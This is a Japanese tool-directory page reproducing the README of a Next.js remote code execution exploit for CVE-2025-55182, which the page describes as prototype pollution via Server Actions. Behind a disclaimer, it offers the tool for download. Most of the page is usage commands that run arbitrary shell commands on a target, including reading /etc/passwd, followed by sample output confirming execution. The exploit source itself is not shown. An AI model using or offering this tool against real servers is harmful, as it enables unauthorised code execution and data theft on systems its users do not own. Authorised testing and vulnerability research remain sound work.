Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-55182-node — CVE-2025-55182 Next.js RCEエクスプロイトツール | Kitploit
ツール/GitHubGitHub/racall/cve-2025-55182-node
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Next.js RCEエクスプロイトツール

リポジトリを見る
18ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 Next.js RCE エクスプロイトツール

中国語ドキュメント | 脆弱性の原理分析


[!CAUTION]

⚠️ 免責事項 - 使用前にお読みください

このツールは以下の目的にのみ使用を意図しています:

  • 脆弱性検証を行うセキュリティ研究者
  • 明示的な許可を得た正規の侵入テスト
  • 教育および学習目的

コンピュータシステムへの不正アクセスは違法です。

このツールを使用することで、以下に同意したものとみなされます:

  1. システムのテスト前に適切な許可を得ていること
  2. このツールを悪意のある目的で使用しないこと
  3. 自身の行動とその結果に対して単独で責任を負うこと

作者はこのツールの誤用に対して一切の責任を負いません。


Next.js のサーバーサイドプロトタイプ汚染(prototype pollution)脆弱性に対するリモートコード実行(RCE)エクスプロイトツールです。

脆弱性の概要

CVE-2025-55182 は Next.js に影響を及ぼす重大なセキュリティ脆弱性で、攻撃者がプロトタイプ汚染を悪用した巧妙なリクエストを通じてリモートコード実行を達成できるようにするものです。

📖 詳細な技術分析については、EXPLOIT.md を参照してください

影響を受けるバージョン

  • Next.js の特定のバージョン(公式セキュリティアドバイザリを参照)

動作原理

この脆弱性は、Next.js Server Actions のリクエスト処理メカニズムを悪用し、__proto__ プロトタイプチェーン汚染と Function コンストラクタを組み合わせることで任意のコード実行を達成します。

インストール

root@kitploit:~
# yarn を使用する場合
yarn install

# npm を使用する場合
npm install

使用方法

直接実行

root@kitploit:~
# 基本的な使い方
node index.js <target_url> [command]

# 例
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

yarn スクリプトを使用する場合

root@kitploit:~
# ツールを実行
yarn start http://localhost:3000 "whoami"

# またはエイリアスを使用
yarn exploit http://localhost:3000 "ls -la"

# ヘルプを表示
yarn help

グローバル CLI インストール

root@kitploit:~
# グローバルにリンク
yarn link
# または
npm link

# その後、コマンドを直接使用
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# リンクを解除
yarn unlink

CLI オプション

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       Target URL (required)
  command   Command to execute (default: whoami)

Options:
  -h, --help     Show help message
  -v, --version  Show version number

出力形式

このツールは結果を JSON 形式で出力します。

実行成功時

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "コマンド実行結果"
}

実行失敗時

root@kitploit:~
{
  "success": false,
  "message": "エラーメッセージ",
  "data": null
}

例

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

依存関係

  • axios - HTTP クライアント
  • form-data - FormData ビルダー

参考リンク

  • Python スクリプトを参照
ツールをダウンロード